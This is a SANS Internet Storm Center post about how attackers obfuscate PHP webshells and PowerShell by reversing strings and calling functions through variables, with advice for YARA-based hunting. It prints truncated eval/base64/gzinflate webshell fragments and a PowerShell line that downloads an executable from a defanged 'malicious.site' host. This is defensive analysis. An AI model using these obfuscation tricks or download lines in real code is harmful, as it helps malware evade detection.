Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Basic Obfuscation With Permissive Languages - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Basic Obfuscation With Permissive Languages

For attackers, obfuscation is key to keep their malicious code below the radar. Code is obfuscated for two main reasons: defeat automatic detection by AV solutions or tools like YARA (which still rely mainly on signatures) and make the code difficult to read/understand by a security analyst.

Languages like PHP or Powershell are very permissive in the way they handle variables and functions. They also provide plenty of functions that are normally not malicious at all but which can sometimes “ring a bell” when found in pieces of code. A few daya ago, I found a webshell sample that was Base64 encoded (classic behaviour) but instead of calling the function directly, it was stored in a variable. This name being in a variable, it can also be obfuscated. Check out this piece of code:

1: <?php
2: $D=strrev('edoced_46esab’);
3: $s=gzinflate($D('7X39d9s2sujvPaf/A83qBmIi0ZKcdLOSKdtNnE3e5uvGzrZ9tq9KSZTEhiJV...

strrev() is a simple PHP function to revert a string. $D contains “base64_decode” and processes the output of gzinflate(). Simple!

But PHP is not the only language to allow this. Powershell too. There is no native strrev() function in Powershell (as far as a know but I’m not a “guru” in Powershell). So, let’s create our own strrev():

1: function strrev() {
2:   param([string]$s)
3:   $in = $s.ToCharArray()
4:   [array]::Reverse($in)
5:   $out = -join($in)
6:   return $out
7: }

Call the  function with a random name and, now, you can call the obfuscated function to hide suspicious ones:

1: $a = "tseuqeRbeW-ekovnI"
2: $b = lyJF5FnYlGDP($a)
3: $data = &$b "hxxp://www.malicious.site/sample.exe"

So, it could be a good idea to search for interesting/rare function names in your hunting regex or YARA rules. Here are some other examples grabbed (mainly from pastebin.com):

1: <?php
2: $v1 = strrev("edoced_46esab");
3: $v2 = strrev("sserpmocnuzg");
4: eval($v2($v1("eF7VPO1227aS/3NO3gFh1FJqFEuynSaVRPrGlrzx…

Or this one:

1: <?php 
2: $thycsy=chr(99)."r".chr(101).chr(97)."t".chr(101).chr(95)."\x66"."u".chr(110).chr(99)."t"."i"."\x6f"."n";
3: $szsglt = $thycsy('$a',strrev(';)a$(lave')); 
4: $szsglt(strrev(';))”=oQD9lQCK0QfJkQCK0gCNsjZ1JGJg8GajVWCJkQCK0QfJkQCJoQDJkQ..."(edoced_46esab(lave'));?>

Base64 encoded strings are also present everywhere (think about all email attachments). If you are hunting for interesting strings, search for them in ASCII or encoded with two bytes per character (use the ‘wide’ YARA keyword[1]) but search also for their Base64 encoded version! Some examples:

  • "Confidential" : Q29uZmlkZW50aWFs
  • "Invoke-Expression": SW52b2tlLUV4cHJlc3Npb24=
  • "ShellExecute": U2hlbGxFeGVjdXRl
  • "eval": ZXZhbA==

Simple obfuscation technique but it works!

[1] https://yara.readthedocs.io/en/v3.4.0/writingrules.html?highlight=wide

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Xme

432 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!